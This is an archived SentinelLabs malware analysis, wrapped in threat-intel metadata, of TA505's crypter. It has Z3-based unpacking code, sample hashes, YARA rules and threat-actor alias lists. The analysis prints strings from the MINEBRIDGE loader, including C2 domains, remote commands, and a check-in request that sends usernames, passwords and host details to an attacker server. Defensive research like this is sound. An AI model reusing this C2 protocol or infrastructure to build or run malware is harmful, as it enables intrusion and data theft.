{
	"id": "2fb8ac31-12a1-4ec2-ad8c-41319b984328",
	"created_at": "2026-04-06T00:14:01.580006Z",
	"updated_at": "2026-04-10T03:36:37.141015Z",
	"deleted_at": null,
	"sha1_hash": "3efa159bd06a5774a1610636ac578752c8a26375",
	"title": "Breaking TA505's Crypter with an SMT Solver - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 824335,
	"plain_text": "Breaking TA505's Crypter with an SMT Solver - SentinelLabs\r\nBy Jason Reaves\r\nPublished: 2020-03-04 · Archived: 2026-04-02 11:12:36 UTC\r\nUsing a satisfiability modulo theories (SMT)[8] solver to break the latest variant of the crypter being used on Get2.\r\nExecutive Summary\r\nTA505 has been leveraging the Get2 loader using the same crypter since at least September 2019.\r\nCrypter overlap found leveraged by actors involved in Clop/CryptoMix ransomware.\r\nCrypter overlap found leveraged by actors involved with MINEBRIDGE, reported by FireEye to also be used by TA505.\r\nCrypter overlap work shows more links of TA505 leveraging Clop/CryptoMix and MINEBRIDGE.\r\nBackground\r\nTA505 [3] has been pushing their Get2 loader DLLs for a long time now using the same tactic [4]; during this time the crypter has remained the same with a few modifications every few months. This crypter is actually a prime candidate for using SMT [1] to solve it, and the latest iteration of the crypter gave me enough of a reason to write up a new unpacker utilizing SMT.\r\nResearch Insight\r\nThe crypter on the DLL has remained mostly static for the past 6 months with a few tweaks here and there. For example, the XOR key for decoding the unpacked binary has moved around a bit; in the latest version, looking at the 32-bit binary, the key was referenced as an offset instead of being placed in relation to the binary blob to be decoded.\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 1 of 9\n\nFigure 1 Data and Key locations in recent sample\r\nThe decoding is actually done by an encoded blob of bytecode which is decoded in a similar manner to the crypted binary.\r\nFigure 2 Decoding routine\r\nThe next layer that is decoded has remained pretty static over the months; it reconstructs the binary data, runs the same decoding routine and finally APLib-decompresses the resulting blob, giving us our unpacked Get2 loader.\r\nFigure 3 Shellcode decoding logic\r\nThe decoding is going to be:\r\nf(x) = rol(x^Δ, 4) + 2004318072\r\nWe also know the output for the first iteration, being a compressed binary, will be ‘M8Zx90’, so we can construct our problem in Z3[2] and let it solve what the XOR key should be.\r\ndef solve_ta505crypter(input, output):\r\n    xorkey = BitVec('xor1', 32)\r\n    s = Solver()\r\n    s.add(rol(BitVecVal(struct.unpack_from('\u003cI',input)[0], 32) ^ xorkey, 4) + 2004318072 == BitVecVa\r\n    return(s)\r\nAfter solving for the XOR key we just decode the data and write out the decompressed file.\r\n    key = None\r\n    for poss_decode in possible_decodes:\r\n        s = solve_ta505crypter(t, poss_decode)\r\n        if s.check() == sat:\r\n            m = s.model()\r\n            for d in m.decls():\r\n                if d.name() == 'xor1':\r\n                    key = m[d].as_long()\r\n    if key:\r\n        out = \"\"\r\n        for i in range(len(t)/4):\r\n            temp = struct.unpack_from('\u003cI', t[i*4:])[0]\r\n            temp ^= key\r\n            temp = rol(temp, 4)\r\n            temp += 2004318072\r\n            out += struct.pack('\u003cI', temp \u0026 0xffffffff)\r\n\r\n        open(sys.argv[1]+'_decodedObject', 'wb').write(out)\r\n        if out[:3] == 'M8Z':\r\n            print(\"Decompressing\")\r\n            out2 = aplib.decompress(out).do()\r\n            open(sys.argv[1]+'_decompressed', 'wb').write(out2[0])\r\nNow with a decoder, we can run it on the past few campaigns to harvest the IOCs. For example:\r\n\u003c..snip..\u003e\r\nf3196cb8288afe0c9e64778d9d82e4ad482153b916547809861f6d95677646fa\r\nDecompressing\r\nf66e03c26afac344b4e38345b26ce104f7131ed81e4f4961d43bd35df83493a5\r\nDecompressing\r\nf769549f2220a54ba738f0ff29c8d6917b9320fb6bc1445a821a990979f49c58\r\nDecompressing\r\nf775f6b32c8d54e44733d5dda34db81bd62e85f4e1df48500b6160403e482756\r\nDecompressing\r\n\u003c..snip..\u003e\r\nPivot\r\nAfter breaking apart a crypter that appears to only be used by a specific actor group, we can pivot on that crypter to see what else they might be using, such as this FlawedAmmy Loader that was mentioned on Twitter[5].\r\n4064ff7e06367b2431d371ddd1e97f659ec7f3c050229350725c91d6fffff835\r\nAnd another FlawedAmmy loader sample:\r\nad320839e01df160c5feb0e89131521719a65ab11c952f33e03d802ecee3f51f\r\nAlso an ‘av_block’ sample: 1c983566c27a154f319bf6f1681b1de91930f3b7c019560a0fbc52ead861bf90\r\nThis sample, when unpacked, shows it is designed to block protection services; its strings are obfuscated using a partial base64 and then eexec decoding.\r\nDeobfuscated strings involve a huge list of security products. This sample appears possibly related to Clop or CryptoMix ransomware[6]. Some of the other strings in the binary we can also decode to get the process and file names related to some common server processes such as SQL, ElasticSearch and Apache.\r\nAnother interesting sample found by pivoting on this packer is a custom loader designed to load TeamViewer, which FireEye calls MINEBRIDGE[7] and lists as also being used as a backdoor.\r\n244a272d25328c05361c106d74a126b57a779585b6c7f622f79019bb6838e982\r\nThis sample after unpacking has a custom UPX layer on it as well.\r\nFigure 4 Custom UPX layer\r\nAfter unpacking the sample fully we have a number of interesting strings.\r\nDomains:\r\nconversia91.top\r\nfatoftheland.top\r\ncreatorz123.top\r\n123faster.top\r\ncompilator333.top\r\nCommands\r\ndrun_command\r\ndrun_URL\r\nrundll_command\r\nrundll_URL\r\nupdate_command\r\nupdate_URL\r\nrestart_command\r\nterminate_command\r\nkill_command\r\npoweroff_command\r\nreboot_command\r\nsetinterval_command\r\nsetinterval_time\r\nC2 Related\r\nuuid=%s\u0026id=%s\u0026pass=%s\u0026username=%s\u0026pcname=%s\u0026osver=%s\u0026timeout=%d\r\n~f83g7bfiunwjsd1/g4t3_indata.php\r\nuuid=%s\u0026drun_status=1\r\nuuid=%s\u0026drun_status=2\r\nuuid=%s\u0026rundll_status=1\r\nuuid=%s\u0026rundll_status=2\r\nuuid=%s\u0026rundll_status=3\r\nuuid=%s\u0026update_status=1\r\nuuid=%s\u0026update_status=2\r\nuuid=%s\u0026restart_status=1\r\nuuid=%s\u0026terminate_status=1\r\nuuid=%s\u0026kill_status=1\r\nuuid=%s\u0026poweroff_status=1\r\nuuid=%s\u0026reboot_status=1\r\nuuid=%s\u0026setinterval_status=1\r\nAlso some hardcoded strings that seem interesting:\r\nTeamViewer\r\n~45feyf923h.bin\r\nhttps://conversia91.top/~files_tv/~all_files_m.bin\r\nWindows Defender\r\nCOM1_\r\nTeamViewer server\r\nTV_Marker\r\nCInfoWindow\r\nTVWidget\r\nWidegetAudioVoipPage\r\nTVScrollWin\r\nButton\r\nSoftwareTeamViewer\r\nTeamViewer\r\nDynGateInstanceMutex\r\n_GAZGOLDER_VASYA\r\n.log\r\n.txt\r\n.tmp\r\nThe loader performs a check-in to the C2 with a hardcoded User-Agent as well.\r\nPOST /~bv0j3irngskdn13/g4t3_indata.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like\r\nHost: compilator333.top\r\nContent-Length: 126\r\nCache-Control: no-cache\r\nuuid=9939DCDD-0E9E-754F-30950A0B\u0026id=.1221882482\u0026pass=p6dj76\u0026username=ZWYJukQ\u0026pcname=qIXONnRuFs\u0026osver=\r\nDownloading the all_files_m.bin gives us a ZIP compressed file full of TeamViewer software:\r\nDate Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2018-09-17 05:17:10 ....A 27268760 11389396 TeamViewer.exe\r\n2017-01-05 08:10:34 ....A 130 90 TeamViewer.ini\r\n2018-09-17 05:17:10 ....A 7491824 2879243 TeamViewer_Desktop.exe\r\n2018-09-17 05:17:28 ....A 728816 150689 TeamViewer_Resource_en.dll\r\n2018-09-17 05:17:12 ....A 1445104 1210362 TeamViewer_StaticRes.dll\r\n------------------- ----- ------------ ------------ ------------------------\r\nIndicators of Compromise\r\nSamples\r\ncf17190546eb876307bde25810973cdaa1bc739e3d85bcc977c858c305130eb4\r\n7420aafbceebd779fce23016e782e2223ed1e9f580e338bbd388beafe66dd10b\r\nURLs\r\n78d05d8a2c0604e115850977304b6a0b347492c9\r\nhxxps:\r\ne87e9041ea10ee08009c1ca1eaf756c8e053eb45\r\nhxxps:\r\n4d62018b98c0ea627c69c0d0463dd35da67a82a3\r\nhxxps:\r\n77d9df72ca8605652b6d804f3944ebc9b2451eac\r\nhxxps:\r\n74d8922f038219a270f75162d8b81d4b48870de7\r\nhxxps:\r\nf5e3db52f0de6d5de8c2bf12d47e45a19f2f112c\r\nhxxps:\r\nfe8c75d8c05101620d1eb8169dcfc40ae9d2932e\r\nhxxps:\r\nec3751f35cffae7a754fa68087d2c252d42a8815\r\nhxxps:\r\nf16d9e525e7ba66cff121e6aa1309d444676ec99\r\nhxxps:\r\n1802ad465d71e054ef0dff23ed608fe4813536af\r\nhxxps:\r\n7fbfaa047b28095b6a333cae56893583ed714bf0\r\nhxxps:\r\n47324f2342dc11eb124f5d44461ae2f8a408a8e5\r\nhxxps:\r\nc4d2a6ba297317ff6f070797cc119fd5e70b749e\r\nhxxps:\r\n5cb0d7ca31f58ec6c2f84d681759d311bc8ecd9e\r\nhxxps:\r\nYARA\r\nrule dll_packer_science_not_feelz\r\n{\r\n    meta:\r\n        author=\"Jason Reaves\"\r\n    strings:\r\n        $a1 = {c7 45 fc 00 00 00 00 8b 45 08 33 45 0c 89 45 08 c1 45 08 04 8b 4d 08 81 c1 78 77 77 77}\r\n    condition:\r\n        all of them\r\n}\r\nrule dll_packer_science_not_feelz_2\r\n{\r\n    meta:\r\n        sample=\"98cbaf55376e928b0c78fce3867d95b9ef4b45c1d91f103f00dad403dd524189\"\r\n        thanks=\"Fowler\"\r\n        author=\"Jason Reaves\"\r\n    strings:\r\n        $a1 = {c7 45 fc 00 00 00 00 8b 45 08 33 45 0c 89 45 08 [0-20] c1 45 08 04 [0-14] 8b 4? 08 [1-2] 78 77\r\n    condition:\r\n        all of them\r\n}\r\nReferences\r\n1: https://vixra.org/abs/2002.0183\r\n2: https://github.com/Z3Prover/z3\r\n3: https://attack.mitre.org/groups/G0092/\r\n4: https://blog.nviso.eu/2019/09/18/malicious-spreadsheet-dropping-a-dll/\r\n5: https://twitter.com/VK_Intel/status/1159277285834407936\r\n6: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-08-03-cryptomix-clop-av_blockk-component.vk.notes.raw\r\n7: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html\r\n8: https://en.wikipedia.org/wiki/Satisfiability_modulo_theories\r\nSource: https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/"
	],
	"report_names": [
		"breaking-ta505s-crypter-with-an-smt-solver"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434441,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.pdf",
		"text": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.txt",
		"img": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.jpg"
	}
}